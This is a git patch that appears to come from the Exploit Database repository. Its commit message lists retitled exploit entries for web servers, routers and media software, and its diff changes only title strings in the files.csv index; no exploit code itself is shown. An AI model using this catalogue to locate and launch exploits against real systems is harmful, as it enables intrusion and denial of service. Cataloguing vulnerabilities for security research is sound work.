From f27338c1f79c1b009f5922c6160285b94d88882e Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 26 Sep 2017 05:01:29 +0000 Subject: [PATCH] DB: 2017-09-26 12 new exploits Apache 2.0.52 - GET Request Denial of Service Apache 2.0.52 - GET Denial of Service CUPS Server 1.1 - GET Request Denial of Service CUPS Server 1.1 - GET Denial of Service BlueCoat WinProxy 6.0 R1c - GET Request Denial of Service BlueCoat WinProxy 6.0 R1c - GET Denial of Service TFTPD32 2.81 - GET Request Format String Denial of Service (PoC) TFTPD32 2.81 - GET Format String Denial of Service (PoC) ImgSvr 0.6.5 - (long http post) Denial of Service ImgSvr 0.6.5 - POST Denial of Service Multi-Threaded TFTP 1.1 - Long GET Request Denial of Service Multi-Threaded TFTP 1.1 - GET Denial of Service Essentia Web Server 2.15 - GET Request Remote Denial of Service Essentia Web Server 2.15 - GET Remote Denial of Service Sami HTTP Server 2.0.1 - POST Request Denial of Service Sami HTTP Server 2.0.1 - POST Denial of Service Xserver 0.1 Alpha - Post Request Remote Buffer Overflow Xserver 0.1 Alpha - POST Remote Buffer Overflow XBMC 8.10 - GET Requests Multiple Remote Buffer Overflow (PoC) XBMC 8.10 - GET Multiple Remote Buffer Overflow (PoC) Zervit Web Server 0.04 - GET Request Remote Buffer Overflow (PoC) Mereo 1.8.0 - GET Request Remote Denial of Service Zervit Web Server 0.04 - GET Remote Buffer Overflow (PoC) Mereo 1.8.0 - GET Remote Denial of Service ARD-9808 DVR Card Security Camera - GET Request Remote Denial of Service ARD-9808 DVR Card Security Camera - GET Remote Denial of Service Kolibri+ Web Server 2 - GET Request Denial of Service Kolibri+ Web Server 2 - GET Denial of Service Adobe InDesign CS3 - '.INDD' File Handling Buffer Overflow Adobe InDesign CS3 - '.INDD' Handling Buffer Overflow Sami HTTP Server 2.0.1 - GET Request Denial of Service Sami HTTP Server 2.0.1 - GET Denial of Service Netscape Enterprise Server 3.6 SP2/FastTrack Server 2.0.1 - GET Request Netscape Enterprise Server 3.6 SP2/FastTrack Server 2.0.1 - GET Exploit (Linux Kernel) ReiserFS 3.5.28 - Potential Code Execution / Denial of Service (Linux Kernel) ReiserFS 3.5.28 - Code Execution / Denial of Service WebTrends Reporting Center for Windows 4.0 d - GET Request Buffer Overflow WebTrends Reporting Center for Windows 4.0 d - GET Buffer Overflow Working Resources BadBlue 1.7.3 - GET Request Denial of Service Working Resources BadBlue 1.7.3 - GET Denial of Service PlanetWeb 1.14 - Long GET Request Buffer Overflow PlanetWeb 1.14 - GET Buffer Overflow My Web Server 1.0.1/1.0.2 - Long GET Request Denial of Service My Web Server 1.0.1/1.0.2 - GET Denial of Service Monkey HTTP Server 0.4/0.5 - Invalid POST Request Denial of Service Monkey HTTP Server 0.4/0.5 - Invalid POST Denial of Service Linksys Devices 1.42/1.43 - GET Request Buffer Overflow Linksys Devices 1.42/1.43 - GET Buffer Overflow Netgear ProSafe 1.x - VPN Firewall Web Interface Login Denial of Service NETGEAR ProSafe 1.x - VPN Firewall Web Interface Login Denial of Service VisNetic ActiveDefense 1.3.1 - Multiple GET Request Denial of Service VisNetic ActiveDefense 1.3.1 - GET Multiple Denial of Service Pi3Web 2.0.1 - GET Request Denial of Service Pi3Web 2.0.1 - GET Denial of Service Snowblind Web Server 1.0/1.1 - GET Request Buffer Overflow Snowblind Web Server 1.0/1.1 - GET Buffer Overflow ArGoSoft Mail Server 1.8.3.5 - Multiple GET Requests Denial of Service WebBBS Pro 1.18 - GET Request Denial of Service ArGoSoft Mail Server 1.8.3.5 - GET Multiple Denial of Service WebBBS Pro 1.18 - GET Denial of Service Proxomitron Proxy Server - Long GET Request Remote Denial of Service Proxomitron Proxy Server - GET Remote Denial of Service Armida Databased Web Server 1.0 - Remote GET Request Denial of Service Armida Databased Web Server 1.0 - GET Remote Denial of Service Twilight WebServer 1.3.3.0 - 'GET' Request Buffer Overflow Twilight WebServer 1.3.3.0 - GET Buffer Overflow Sami FTP Server 1.1.3 - Library Crafted GET Request Remote Denial of Service Sami FTP Server 1.1.3 - Library Crafted GET Remote Denial of Service Loom Software SurfNow 1.x/2.x - Remote GET Request Denial of Service Loom Software SurfNow 1.x/2.x - GET Remote Denial of Service Sambar Server 6.0 - 'results.stm' POST Request Buffer Overflow Sambar Server 6.0 - 'results.stm' POST Buffer Overflow Linksys PSUS4 PrintServer - POST Request Denial of Service Linksys PSUS4 PrintServer - POST Denial of Service Thomson TCW690 Cable Modem ST42.03.0a - Long GET Request Denial of Service Thomson TCW690 Cable Modem ST42.03.0a - GET Denial of Service Netgear ProSafe - Denial of Service NETGEAR ProSafe - Denial of Service Multiple IEA Software Products - POST Request Denial of Service Multiple IEA Software Products - POST Denial of Service Netgear WGR614 - Administration Interface Remote Denial of Service NETGEAR WGR614 - Administration Interface Remote Denial of Service Remote Help HTTP 0.0.7 - GET Request Format String Denial of Service Remote Help HTTP 0.0.7 - GET Format String Denial of Service Geo++ GNCASTER 1.4.0.7 - GET Request Denial of Service Geo++ GNCASTER 1.4.0.7 - GET Denial of Service D-Link WBR-2310 1.0.4 - GET Request Remote Buffer Overflow D-Link WBR-2310 1.0.4 - GET Remote Buffer Overflow Polipo 1.0.4.1 - POST/PUT Requests HTTP Header Processing Denial of Service Polipo 1.0.4.1 - POST/PUT HTTP Header Processing Denial of Service CoDeSys 3.4 - HTTP POST Request Null Pointer Content-Length Parsing Remote Denial of Service CoDeSys 3.4 - HTTP POST Null Pointer Content-Length Parsing Remote Denial of Service Zoom Player - '.avi' File Divide-by-Zero Denial of Service Zoom Player - '.avi' Divide-by-Zero Denial of Service Adobe Flash - Out-of-Bounds Memory Read While Parsing a Mutated '.SWF' File (1) Adobe Flash - Out-of-Bounds Memory Read While Parsing a Mutated '.SWF' File (2) Adobe Flash - '.SWF' Out-of-Bounds Memory Read (1) Adobe Flash - '.SWF' Out-of-Bounds Memory Read (2) Microsoft Windows - Cursor Object Potential Memory Leak (MS15-115) Microsoft Windows - Cursor Object Memory Leak (MS15-115) Adobe Photoshop CC / Bridge CC - '.png' File Parsing Memory Corruption (1) Adobe Photoshop CC / Bridge CC - '.png' File Parsing Memory Corruption (2) Adobe Photoshop CC & Bridge CC - '.iff' File Parsing Memory Corruption Adobe Photoshop CC / Bridge CC - '.png' Parsing Memory Corruption (1) Adobe Photoshop CC / Bridge CC - '.png' Parsing Memory Corruption (2) Adobe Photoshop CC & Bridge CC - '.iff' Parsing Memory Corruption Adobe Flash - '.MP4' File Stack Corruption Adobe Flash - '.MP4' Stack Corruption Adobe Photoshop CS2 / CS3 - Unspecified '.bmp' File Buffer Overflow Adobe Photoshop CS2 / CS3 - '.bmp' Buffer Overflow Zoom Player Pro 3.30 - '.m3u' File Buffer Overflow (SEH) Zoom Player Pro 3.30 - '.m3u' Buffer Overflow (SEH) Linux Kernel 2.2.x/2.4.x - '/proc' Filesystem Potential Information Disclosure Linux Kernel 2.2.x/2.4.x - '/proc' Filesystem Information Disclosure Adrenalin Player 2.2.5.3 - '.m3u' File Buffer Overflow (SEH) (ASLR + DEP Bypass) Adrenalin Player 2.2.5.3 - '.m3u' Buffer Overflow (SEH) (ASLR + DEP Bypass) Netgear Genie 2.4.32 - Unquoted Service Path Privilege Escalation NETGEAR Genie 2.4.32 - Unquoted Service Path Privilege Escalation CyberLink LabelPrint < 2.5 - Buffer Overflow (SEH Unicode) LimeWire 4.1.2 < 4.5.6 - Inappropriate GET Request Remote Exploit LimeWire 4.1.2 < 4.5.6 - Inappropriate GET Remote Exploit PMSoftware Simple Web Server - GET Request Remote Buffer Overflow PMSoftware Simple Web Server - GET Remote Buffer Overflow Fenice Oms 1.10 - Long GET Request Remote Buffer Overflow Fenice Oms 1.10 - GET Remote Buffer Overflow webdesproxy 0.0.1 - GET Request Remote Buffer Overflow webdesproxy 0.0.1 - GET Remote Buffer Overflow webdesproxy 0.0.1 - (exec-shield) GET Request Remote Code Execution webdesproxy 0.0.1 - (exec-shield) GET Remote Code Execution Savant Web Server 3.1 - GET Request Remote Overflow (Universal) Savant Web Server 3.1 - GET Remote Overflow (Universal) Belkin Wireless G Plus MIMO Router F5D9230-4 - Authentication Bypass Belkin F5D9230-4 Wireless G Plus MIMO Router - Authentication Bypass Netgear WG102 - Leaks SNMP Write Password With Read Access NETGEAR WG102 - Leaks SNMP Write Password With Read Access XBMC 8.10 (Windows) - GET Request Remote Buffer Overflow XBMC 8.10 (Windows) - GET Remote Buffer Overflow XBMC 8.10 - GET Request Remote Buffer Overflow (SEH) (Universal) XBMC 8.10 - GET Remote Buffer Overflow (SEH) (Universal) Netgear WNR2000 FW 1.2.0.8 - Information Disclosure NETGEAR WNR2000 FW 1.2.0.8 - Information Disclosure Kolibri+ Web Server 2 - GET Request Remote Overwrite (SEH) Kolibri+ Web Server 2 - GET Remote Overwrite (SEH) BigAnt Server 2.50 - GET Request Remote Buffer Overflow (SEH) BigAnt Server 2.50 - GET Remote Buffer Overflow (SEH) BigAnt Server 2.50 - GET Request Universal Remote Buffer Overflow (SEH) BigAnt Server 2.50 - GET Universal Remote Buffer Overflow (SEH) httpdx 1.4 - GET Request Buffer Overflow httpdx 1.4 - GET Buffer Overflow Netgear WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit) NETGEAR WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit) Proxy-Pro Professional GateKeeper 4.7 - GET Request Overflow (Metasploit) Proxy-Pro Professional GateKeeper 4.7 - GET Overflow (Metasploit) Linksys WRT54 (Access Point) - apply.cgi Buffer Overflow (Metasploit) Linksys WRT54 Access Point - apply.cgi Buffer Overflow (Metasploit) Oracle Weblogic Apache Connector - POST Request Buffer Overflow (Metasploit) Oracle Weblogic Apache Connector - POST Buffer Overflow (Metasploit) Berkeley Sendmail 5.58 - Debug exploit Berkeley Sendmail 5.58 - Debug Exploit A-V Tronics InetServ 3.0 - WebMail Long GET Request A-V Tronics InetServ 3.0 - WebMail GET Exploit Light HTTPD 0.1 - GET Request Buffer Overflow (1) Light HTTPD 0.1 - GET Request Buffer Overflow (2) Light HTTPD 0.1 - GET Buffer Overflow (1) Light HTTPD 0.1 - GET Buffer Overflow (2) Netgear FM114P Wireless Firewall - File Disclosure NETGEAR FM114P Wireless Firewall - File Disclosure Athttpd 0.4b - Remote GET Request Buffer Overrun Athttpd 0.4b - GET Remote Buffer Overrun IA WebMail Server 3.0/3.1 - Long GET Request Buffer Overrun IA WebMail Server 3.0/3.1 - GET Buffer Overrun Monit 1.4/2.x/3/4 - Overly Long HTTP Request Buffer Overrun Monit 1.4/2.x/3/4 - Long HTTP Request Buffer Overrun KarjaSoft Sami HTTP Server 1.0.4 - GET Request Buffer Overflow KarjaSoft Sami HTTP Server 1.0.4 - GET Buffer Overflow MyWeb HTTP Server 3.3 - GET Request Buffer Overflow MyWeb HTTP Server 3.3 - GET Buffer Overflow Omnicron OmniHTTPd 2.x/3.0 - GET Request Buffer Overflow Omnicron OmniHTTPd 2.x/3.0 - GET Buffer Overflow Netgear RP114 3.26 - Content Filter Bypass NETGEAR RP114 3.26 - Content Filter Bypass Netgear DGN1000B - setup.cgi Remote Command Execution (Metasploit) NETGEAR DGN1000B - setup.cgi Remote Command Execution (Metasploit) Netgear DGN2200B - pppoe.cgi Remote Command Execution (Metasploit) NETGEAR DGN2200B - pppoe.cgi Remote Command Execution (Metasploit) Netgear MA521 Wireless Driver 5.148.724 - Long Beacon Probe Buffer Overflow NETGEAR MA521 Wireless Driver 5.148.724 - Long Beacon Probe Buffer Overflow Netgear WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow NETGEAR WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow Netgear ReadyNAS - Perl Code Evaluation (Metasploit) NETGEAR ReadyNAS - Perl Code Evaluation (Metasploit) Netgear SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting NETGEAR SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting Zoom Player 3.30/5/6 - Crafted '.ZPL' File Error Message Arbitrary Code Execution Zoom Player 3.30/5/6 - '.ZPL' Error Message Arbitrary Code Execution Ultra Mini HTTPD 1.21 - POST Request Stack Buffer Overflow Ultra Mini HTTPD 1.21 - POST Stack Buffer Overflow Kolibri Web Server 2.0 - GET Request Stack Buffer Overflow Kolibri Web Server 2.0 - GET Stack Buffer Overflow NetGear WNR2000 - Multiple Information Disclosure Vulnerabilities NETGEAR WNR2000 - Multiple Information Disclosure Vulnerabilities HTTP 1.1 - GET Request Directory Traversal HTTP 1.1 - GET Directory Traversal Kolibri Web Server 2.0 - GET Request (SEH) D-Link Devices - 'info.cgi' POST Request Buffer Overflow (Metasploit) Kolibri Web Server 2.0 - GET Exploit (SEH) D-Link Devices - 'info.cgi' POST Buffer Overflow (Metasploit) Belkin n750 - jump login Parameter Buffer Overflow Belkin N750 - jump login Parameter Buffer Overflow Netgear WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities NETGEAR WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities Belkin Wireless Router Default - WPS PIN Security Belkin Wireless Router - Default WPS PIN Security Easy File Sharing Web Server 7.2 - GET Request Buffer Overflow (SEH) Easy File Sharing Web Server 7.2 - GET Buffer Overflow (SEH) Netgear D6300B - '/diag.cgi' 'IPAddr4' Parameter Remote Command Execution NETGEAR D6300B - '/diag.cgi' 'IPAddr4' Parameter Remote Command Execution Netgear ProSafe Network Management System NMS300 - Arbitrary File Upload (Metasploit) NETGEAR NMS300 ProSafe Network Management System - Arbitrary File Upload (Metasploit) NUUO NVRmini2 / NVRsolo / Crystal Devices / Netgear ReadyNAS Surveillance Application - Multiple Vulnerabilities NUUO NVRmini2 / NVRsolo / Crystal Devices / NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities NETGEAR ADSL Router JNR1010 - Authenticated Remote File Disclosure NETGEAR ADSL Router WNR500/WNR612v3/JNR1010/JNR2010 - Authenticated Remote File Disclosure NETGEAR JNR1010 ADSL Router - Authenticated Remote File Disclosure NETGEAR WNR500/WNR612v3/JNR1010/JNR2010 ADSL Router - Authenticated Remote File Disclosure Netgear R7000 and R6400 - 'cgi-bin' Command Injection (Metasploit) NETGEAR R7000 / R6400 - 'cgi-bin' Command Injection (Metasploit) Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (SEH) Easy File Sharing Web Server 7.2 - GET 'PassWD' Buffer Overflow (SEH) Supervisor 3.0a1 - 3.3.2 - XML-RPC Authenticated Remote Code Execution (Metasploit) Netgear DGN2200 - dnslookup.cgi Command Injection (Metasploit) NETGEAR DGN2200 - dnslookup.cgi Command Injection (Metasploit) Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (DEP Bypass) Easy File Sharing Web Server 7.2 - GET 'PassWD' Buffer Overflow (DEP Bypass) Belkin NetCam F7D7601 - Multiple Vulnerabilities Belkin F7D7601 NetCam - Multiple Vulnerabilities Alienvault Open Source SIEM (OSSIM) < 4.8.0 - 'get_file' Information Disclosure (Metasploit) Alienvault Open Source SIEM (OSSIM) < 4.8.0 - 'get_file' Information Disclosure (Metasploit) Disk Pulse Enterprise 10.0.12 - GET Buffer Overflow (SEH) Oracle 9i XDB 9.2.0.1 - HTTP PASS Buffer Overflow Quezza BB 1.0 - (quezza_root_path) File Inclusion Quezza BB 1.0 - 'quezza_root_path' File Inclusion The Bible Portal Project 2.12 - (destination) File Inclusion The Bible Portal Project 2.12 - 'destination' File Inclusion Vivvo Article Manager 3.2 - (classified_path) File Inclusion Vivvo Article Manager 3.2 - 'classified_path' File Inclusion Forum82 < 2.5.2b - (repertorylevel) Multiple File Inclusion Forum82 < 2.5.2b - 'repertorylevel' Multiple File Inclusion OpenDock Easy Doc 1.4 - (doc_directory) File Inclusion OpenDock Easy Blog 1.4 - (doc_directory) File Inclusion WebYep 1.1.9 - (webyep_sIncludePath) File Inclusion OpenDock Easy Gallery 1.4 - (doc_directory) File Inclusion OpenDock Easy Doc 1.4 - 'doc_directory' File Inclusion OpenDock Easy Blog 1.4 - 'doc_directory' File Inclusion WebYep 1.1.9 - 'webyep_sIncludePath' File Inclusion OpenDock Easy Gallery 1.4 - 'doc_directory' File Inclusion Open Conference Systems 1.1.4 - (fullpath) File Inclusion Open Conference Systems 1.1.4 - 'fullpath' File Inclusion SpeedBerg 1.2beta1 - (SPEEDBERG_PATH) File Inclusion SpeedBerg 1.2beta1 - 'SPEEDBERG_PATH' File Inclusion PhpShop Core 0.9.0 RC1 - (PS_BASE) File Inclusion PhpShop Core 0.9.0 RC1 - 'PS_BASE' File Inclusion Phpjobscheduler 3.0 - (installed_config_file) File Inclusion Phpjobscheduler 3.0 - 'installed_config_file' File Inclusion Magic Photo Storage Website - _config[site_path] File Inclusion Magic Photo Storage Website - '_config[site_path]' File Inclusion Linksys Cisco WAG120N - Cross-Site Request Forgery Cisco Linksys WAG120N - Cross-Site Request Forgery Belkin G Wireless Router F5D7234-4 v5 - Exploit Belkin F5D7234-4 v5 G Wireless Router - Exploit Netgear Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery NETGEAR Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery PHP-Nuke 6.x/7.x - Modpath Parameter Potential File Inclusion PHP-Nuke 6.x/7.x - 'Modpath' Parameter File Inclusion Netgear SPH200D - Multiple Vulnerabilities NETGEAR SPH200D - Multiple Vulnerabilities Netgear DGN1000B - Multiple Vulnerabilities NETGEAR DGN1000B - Multiple Vulnerabilities Netgear DGN2200B - Multiple Vulnerabilities NETGEAR DGN2200B - Multiple Vulnerabilities Netgear WNR1000 - Authentication Bypass NETGEAR WNR1000 - Authentication Bypass PHPMyVisites 1.3 - Set_Lang File Inclusion PHPMyVisites 1.3 - 'Set_Lang' File Inclusion PPA 0.5.6 - ppa_root_path File Inclusion PPA 0.5.6 - 'ppa_root_path' File Inclusion Netgear WPN824v3 - Unauthorized Config Download NETGEAR WPN824v3 - Unauthorized Config Download Netgear DGN1000 / DGN2200 - Multiple Vulnerabilities NETGEAR DGN1000 / DGN2200 - Multiple Vulnerabilities Netgear ProSafe - Information Disclosure NETGEAR ProSafe - Information Disclosure Netgear WNR1000v3 - Password Recovery Credential Disclosure (Metasploit) NETGEAR WNR1000v3 - Password Recovery Credential Disclosure (Metasploit) Simple Machines Forum (SMF) 1.1.6 - POST Request Filter Security Bypass Simple Machines Forum (SMF) 1.1.6 - POST Filter Security Bypass Netgear N600 Wireless Dual Band WNDR3400 - Multiple Vulnerabilities NETGEAR WNDR3400 N600 Wireless Dual Band - Multiple Vulnerabilities Belkin Router AC1200 Firmware 1.00.27 - Authentication Bypass Belkin AC1200 Router Firmware 1.00.27 - Authentication Bypass Netgear DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting Netgear DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure ManageEngine ADSelfService Plus 4.4 - POST Request Manipulation Security Question ManageEngine ADSelfService Plus 4.4 - POST Manipulation Security Question Netgear ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure NETGEAR ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure Netgear Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities NETGEAR Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities Belkin Router N150 1.00.08/1.00.09 - Directory Traversal Belkin N150 Router 1.00.08/1.00.09 - Directory Traversal eBay Magento CE 1.9.2.1 - Unrestricted Cron Script (Potential Code Execution / Denial of Service) eBay Magento CE 1.9.2.1 - Unrestricted Cron Script (Code Execution / Denial of Service) Belkin N150 Wireless Home Router F9K1009 v1 - Multiple Vulnerabilities Belkin N150 Wireless Router F9K1009 v1 - Multiple Vulnerabilities Netgear WNR1000v4 - Authentication Bypass NETGEAR WNR1000v4 - Authentication Bypass Netgear ProSafe Network Management System NMS300 - Multiple Vulnerabilities NETGEAR NMS300 ProSafe Network Management System - Multiple Vulnerabilities Netgear R7000 - Command Injection Netgear R7000 - Cross-Site Scripting NETGEAR R7000 - Command Injection NETGEAR R7000 - Cross-Site Scripting Tenda N3 Wireless N150 Home Router - Authentication Bypass Tenda N3 Wireless N150 Router - Authentication Bypass DenyAll WAF < 6.3.0 - Remote Code Execution (Metasploit) Lending And Borrowing - 'pid' Parameter SQL Injection Multi Level Marketing - SQL Injection Cash Back Comparison Script 1.0 - SQL Injection Claydip Airbnb Clone 1.0 - Arbitrary File Upload Secure E-commerce Script 1.02 - 'sid' Parameter SQL Injection PHP Auction Ecommerce Script 1.6 - SQL Injection JitBit HelpDesk < 9.0.2 - Authentication Bypass --- files.csv | 336 ++++++------ platforms/asp/webapps/42776.txt | 13 + platforms/linux/remote/42779.rb | 169 ++++++ platforms/linux/webapps/42769.rb | 103 ++++ platforms/php/webapps/42761.txt | 3 +- platforms/php/webapps/42770.txt | 27 + platforms/php/webapps/42771.txt | 30 ++ platforms/php/webapps/42772.pl | 59 +++ platforms/php/webapps/42773.txt | 73 +++ platforms/php/webapps/42774.txt | 41 ++ platforms/php/webapps/42775.txt | 41 ++ platforms/win_x86-64/remote/42030.py | 170 +++--- platforms/win_x86-64/remote/42031.py | 172 ++++--- platforms/windows/local/42777.py | 154 ++++++ platforms/windows/remote/42315.py | 739 ++++++++++++++++++++++----- platforms/windows/remote/42778.py | 89 ++++ platforms/windows/remote/42780.py | 75 +++ 17 files changed, 1846 insertions(+), 448 deletions(-) create mode 100755 platforms/asp/webapps/42776.txt create mode 100755 platforms/linux/remote/42779.rb create mode 100755 platforms/linux/webapps/42769.rb create mode 100755 platforms/php/webapps/42770.txt create mode 100755 platforms/php/webapps/42771.txt create mode 100755 platforms/php/webapps/42772.pl create mode 100755 platforms/php/webapps/42773.txt create mode 100755 platforms/php/webapps/42774.txt create mode 100755 platforms/php/webapps/42775.txt create mode 100755 platforms/windows/local/42777.py create mode 100755 platforms/windows/remote/42778.py create mode 100755 platforms/windows/remote/42780.py diff --git a/files.csv b/files.csv index b65030668..980a020fb 100644 --- a/files.csv +++ b/files.csv @@ -140,7 +140,7 @@ id,file,description,date,author,platform,type,port 843,platforms/windows/dos/843.c,"KNet Web Server 1.04c - Buffer Overflow Denial of Service",2005-02-25,CorryL,windows,dos,0 849,platforms/windows/dos/849.c,"Scrapland 1.0 - Server Termination Denial of Service",2005-02-28,"Luigi Auriemma",windows,dos,0 852,platforms/windows/dos/852.py,"Trillian Basic 3.0 - '.png' Image Processing Buffer Overflow",2005-03-02,"Tal Zeltzer",windows,dos,0 -855,platforms/multiple/dos/855.pl,"Apache 2.0.52 - GET Request Denial of Service",2005-03-04,GreenwooD,multiple,dos,0 +855,platforms/multiple/dos/855.pl,"Apache 2.0.52 - GET Denial of Service",2005-03-04,GreenwooD,multiple,dos,0 856,platforms/hardware/dos/856.c,"Nokia Symbian 60 - 'BlueTooth Nickname' Remote Restart (2)",2005-09-23,Qnix,hardware,dos,0 861,platforms/windows/dos/861.c,"Microsoft Windows XP/2003 - Remote Denial of Service",2005-03-07,RusH,windows,dos,0 867,platforms/multiple/dos/867.c,"Ethereal 0.10.9 - Denial of Service",2005-03-08,"Leon Juranic",multiple,dos,0 @@ -218,7 +218,7 @@ id,file,description,date,author,platform,type,port 1175,platforms/cgi/dos/1175.pl,"GTChat 0.95 Alpha - 'adduser' Remote Denial of Service",2005-08-23,VTECin5th,cgi,dos,0 1176,platforms/multiple/dos/1176.c,"Ventrilo 2.3.0 (All Platforms) - Remote Denial of Service",2005-08-23,"Luigi Auriemma",multiple,dos,0 1192,platforms/windows/dos/1192.cpp,"P2P Pro 1.0 - 'command' Denial of Service",2005-09-02,basher13,windows,dos,0 -1196,platforms/linux/dos/1196.c,"CUPS Server 1.1 - GET Request Denial of Service",2005-09-05,tracewar,linux,dos,0 +1196,platforms/linux/dos/1196.c,"CUPS Server 1.1 - GET Denial of Service",2005-09-05,tracewar,linux,dos,0 1199,platforms/windows/dos/1199.c,"BNBT BitTorrent EasyTracker 7.7r3 - Denial of Service",2005-09-06,Sowhat,windows,dos,0 1204,platforms/multiple/dos/1204.html,"Mozilla Products - 'Host:' Buffer Overflow Denial of Service String",2005-09-09,"Tom Ferris",multiple,dos,0 1212,platforms/windows/dos/1212.pl,"COOL! Remote Control 1.12 - Remote Denial of Service",2005-09-11,basher13,windows,dos,0 @@ -270,12 +270,12 @@ id,file,description,date,author,platform,type,port 1390,platforms/multiple/dos/1390.c,"BZFlag 2.0.4 - (undelimited string) Denial of Service",2005-12-27,"Luigi Auriemma",multiple,dos,0 1394,platforms/windows/dos/1394.html,"Microsoft Internet Explorer 6 - 'mshtml.dll div' Denial of Service",2005-12-29,rgod,windows,dos,0 1396,platforms/windows/dos/1396.cpp,"Microsoft IIS - HTTP Request Denial of Service",2005-12-29,Lympex,windows,dos,0 -1409,platforms/windows/dos/1409.pl,"BlueCoat WinProxy 6.0 R1c - GET Request Denial of Service",2006-01-07,FistFuXXer,windows,dos,0 +1409,platforms/windows/dos/1409.pl,"BlueCoat WinProxy 6.0 R1c - GET Denial of Service",2006-01-07,FistFuXXer,windows,dos,0 1411,platforms/hardware/dos/1411.pl,"Cisco IP Phone 7940 - Reboot (Denial of Service)",2006-01-10,kokanin,hardware,dos,0 1416,platforms/windows/dos/1416.c,"HomeFtp 1.1 - (NLST) Denial of Service",2006-01-14,pi3ch,windows,dos,0 1422,platforms/windows/dos/1422.c,"Cerberus FTP Server 2.32 - Denial of Service",2006-01-16,pi3ch,windows,dos,0 1423,platforms/windows/dos/1423.html,"Microsoft Internet Explorer 6.x - (IMG / XML elements) Denial of Service",2006-01-18,"Inge Henriksen",windows,dos,0 -1424,platforms/windows/dos/1424.pl,"TFTPD32 2.81 - GET Request Format String Denial of Service (PoC)",2006-01-19,"Critical Security",windows,dos,0 +1424,platforms/windows/dos/1424.pl,"TFTPD32 2.81 - GET Format String Denial of Service (PoC)",2006-01-19,"Critical Security",windows,dos,0 1447,platforms/hardware/dos/1447.c,"Cisco Aironet Wireless Access Points - Memory Exhaustion ARP (Denial of Service)",2006-01-25,Pasv,hardware,dos,0 1464,platforms/hardware/dos/1464.c,"Arescom NetDSL-1000 - (TelnetD) Remote Denial of Service",2006-02-02,"Fabian Ramirez",hardware,dos,0 1473,platforms/hardware/dos/1473.c,"Sony/Ericsson Bluetooth - (Reset Display) Denial of Service",2006-02-06,"Pierre Betouin",hardware,dos,0 @@ -358,7 +358,7 @@ id,file,description,date,author,platform,type,port 1972,platforms/multiple/dos/1972.txt,"Opera Web Browser 9.00 - (iframe) Remote Denial of Service",2006-07-01,y3dips,multiple,dos,0 1976,platforms/windows/dos/1976.cpp,"Quake 3 Engine Client - 'CG_ServerCommand()' Remote Overflow",2006-07-02,RunningBon,windows,dos,0 1977,platforms/win_x86/dos/1977.cpp,"Quake 3 Engine Client (Windows x86) - CS_ITEms Remote Overflow",2006-07-02,RunningBon,win_x86,dos,0 -1980,platforms/windows/dos/1980.pl,"ImgSvr 0.6.5 - (long http post) Denial of Service",2006-07-04,n00b,windows,dos,0 +1980,platforms/windows/dos/1980.pl,"ImgSvr 0.6.5 - POST Denial of Service",2006-07-04,n00b,windows,dos,0 1984,platforms/windows/dos/1984.py,"WinRAR 3.60 Beta 6 - (SFX Path) Stack Overflow",2006-07-05,posidron,windows,dos,0 1989,platforms/windows/dos/1989.html,"Microsoft Internet Explorer 6 - Table.Frameset NULL Dereference",2006-07-07,"Aviv Raff",windows,dos,0 1990,platforms/windows/dos/1990.html,"Microsoft Internet Explorer 6 - 'Internet.HHCtrl' Heap Overflow",2006-07-07,"H D Moore",windows,dos,0 @@ -389,7 +389,7 @@ id,file,description,date,author,platform,type,port 2246,platforms/hardware/dos/2246.cpp,"2WIRE Modems/Routers - 'CRLF' Denial of Service",2006-08-22,preth00nker,hardware,dos,0 2302,platforms/windows/dos/2302.pl,"J. River Media Center 11.0.309 - Remote Denial of Service (PoC)",2006-09-05,n00b,windows,dos,0 2303,platforms/multiple/dos/2303.html,"dsock 1.3 - (buf) Remote Buffer Overflow (PoC)",2006-09-05,DaveK,multiple,dos,0 -2334,platforms/windows/dos/2334.py,"Multi-Threaded TFTP 1.1 - Long GET Request Denial of Service",2006-09-08,n00b,windows,dos,0 +2334,platforms/windows/dos/2334.py,"Multi-Threaded TFTP 1.1 - GET Denial of Service",2006-09-08,n00b,windows,dos,0 2400,platforms/windows/dos/2400.html,"Microsoft Internet Explorer - (VML) Remote Denial of Service (PoC)",2006-09-19,Shirkdog,windows,dos,0 2444,platforms/multiple/dos/2444.sh,"OpenSSH 4.3 p1 - (Duplicated Block) Remote Denial of Service",2006-09-27,"Tavis Ormandy",multiple,dos,0 2515,platforms/multiple/dos/2515.txt,"Kmail 1.9.1 - (IMG SRC) Remote Denial of Service",2006-10-11,nnp,multiple,dos,0 @@ -411,7 +411,7 @@ id,file,description,date,author,platform,type,port 2700,platforms/hardware/dos/2700.rb,"Apple Airport - 802.11 Probe Response Kernel Memory Corruption (PoC) (Metasploit)",2006-11-01,"H D Moore",hardware,dos,0 2708,platforms/windows/dos/2708.c,"NullSoft Winamp 5.3 - (Ultravox-Max-Msg) Heap Overflow Denial of Service (PoC)",2006-11-03,cocoruder,windows,dos,0 2715,platforms/windows/dos/2715.pl,"XM Easy Personal FTP Server 5.2.1 - Remote Denial of Service",2006-11-04,boecke,windows,dos,0 